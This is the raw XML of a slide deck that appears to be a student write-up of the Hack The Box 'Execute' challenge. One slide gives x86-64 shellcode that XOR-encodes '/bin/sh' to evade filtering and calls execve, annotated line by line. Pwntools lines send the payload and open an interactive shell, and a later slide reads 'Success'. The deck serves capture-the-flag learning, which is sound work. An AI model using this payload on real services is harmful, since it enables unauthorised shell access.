          <p:cNvSpPr txBox="1"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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038975" y="6223000"/>
            <a:ext cx="1905000" cy="4572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  <a:t>8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/>
              <a:t>ASM ShellCode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6150" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1524000"/>
            <a:ext cx="8649970" cy="5008245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/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode = '''    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mov rax, 0x2020202020202020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>push rax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mov rax, 0x2020202020202020 ^ 0x68732f6e69622f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xor [rsp], rax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mov rdi, rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>push 0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pop rsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>push 0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pop rdx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>push 0x3a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pop rax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>add al, 0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'''</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Line Callout 1 (Accent Bar) 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="1600200"/>
            <a:ext cx="1450340" cy="325120"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 150195"/>
              <a:gd name="adj4" fmla="val -23393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push key to stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Line Callout 1 (Accent Bar) 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="2712720"/>
            <a:ext cx="1450340" cy="325120"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -1171"/>
              <a:gd name="adj4" fmla="val -1228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encrpted /bin/sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Line Callout 1 (Accent Bar) 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="3200400"/>
            <a:ext cx="1642110" cy="325120"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -1171"/>
              <a:gd name="adj4" fmla="val -1228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decrpt /bin/sh by XOR key and encrpted string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Line Callout 1 (Accent Bar) 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="3733800"/>
            <a:ext cx="1642110" cy="325120"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -1171"/>
              <a:gd name="adj4" fmla="val -1228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1st argument to sys call points to decrpted /bin/sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Line Callout 1 (Accent Bar) 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="4495800"/>
            <a:ext cx="1642110" cy="325120"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -1171"/>
              <a:gd name="adj4" fmla="val -1228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2nd argument to sys call is NULL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Line Callout 1 (Accent Bar) 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="4953000"/>
            <a:ext cx="1642110" cy="325120"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -1171"/>
              <a:gd name="adj4" fmla="val -1228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3rd argument to sys call is NULL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Line Callout 1 (Accent Bar) 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="5715000"/>
            <a:ext cx="1532890" cy="325120"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -1171"/>
              <a:gd name="adj4" fmla="val -12285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rax to 03b, which sets execve() call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Brace 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="4191000"/>
            <a:ext cx="76200" cy="38100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Right Brace 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727200" y="4699000"/>
            <a:ext cx="76200" cy="38100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1828800" y="5562600"/>
            <a:ext cx="76200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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8CEFBD-C5D3-FA07-0751-63A65275322E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6063241" y="5498669"/>
            <a:ext cx="2872000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sc = asm(shellcode)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
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sh.sendline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sc)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
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sh.interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()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 hidden="1"/>
          <p:cNvSpPr txBox="1"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4 Feb 2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Footer Placeholder 4" hidden="1"/>
          <p:cNvSpPr txBox="1"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CS 3243 - Constraint Satisfaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Slide Number Placeholder 5" hidden="1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038975" y="6223000"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0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  <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614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en-US"/>
              <a:t>Result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6330" y="1524000"/>
            <a:ext cx="7026910" cy="4608830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangles 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8029BEA-1966-6CD1-612F-DE4A503E48C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645552" y="5333499"/>
            <a:ext cx="2214068" cy="707886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altLang="zh-CN" sz="4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ahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Success</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4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Tahoma"/>
              <a:cs typeface="Tahom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2587eee-994e-43fa-90e3-77c2147007b3"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMTMyYzJhZTY1MWJjMmY2ZDQ3ZTRkZWQwZjQ5YzYxYWYifQ=="/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Blends">
  <a:themeElements>
    <a:clrScheme name="Blends 7">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="5B6501"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="333333"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="EBF440"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B44CAD"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F3F8AF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A3449C"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="B0D27E"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FDF703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B6501"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="333333"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="EBF440"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B44CAD"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="F3F8AF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A3449C"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="B0D27E"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="FDF7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8746F963372C4FBA6E9636DFB4BA45" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="32d7c8d9182a1356a4964450533aa529">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="708a5de9-c194-4aef-93a2-8721af68b98a" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="4b980ca2a89d151aab459d1d38ead90a" ns2:_="">
    <xsd:import namespace="708a5de9-c194-4aef-93a2-8721af68b9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8a5de9-c194-4aef-93a2-8721af68b9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0B7137-3B5B-4C3C-A08F-96032D6F3F4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7B65D59-B8BB-492B-8551-91E39E9B27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1C7AEA-DBFA-4FD8-99FC-180119763D00}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="708a5de9-c194-4aef-93a2-8721af68b9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3243</Template>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Slides>9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Blends</vt:lpstr>
      <vt:lpstr> Project Execute (HTB)</vt:lpstr>
      <vt:lpstr>HTB Challenge: Execute</vt:lpstr>
      <vt:lpstr>Source File and Behavior</vt:lpstr>
      <vt:lpstr>Goal and Long String Test</vt:lpstr>
      <vt:lpstr>Goal and Long String Test</vt:lpstr>
      <vt:lpstr>Apply Long String to Remote</vt:lpstr>
      <vt:lpstr>Different Route and Idea</vt:lpstr>
      <vt:lpstr>ASM ShellCode</vt:lpstr>
      <vt:lpstr>Result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Problems</dc:title>
  <dc:creator>Min-Yen Kan</dc:creator>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-12-17T05:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-25T22:48:00Z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875722BBD8E14418B1484C1653D76BE5</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.20795</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ContentTypeId">
    <vt:lpwstr>0x010100A28746F963372C4FBA6E9636DFB4BA45</vt:lpwstr>
  </property>
</Properties>
</file>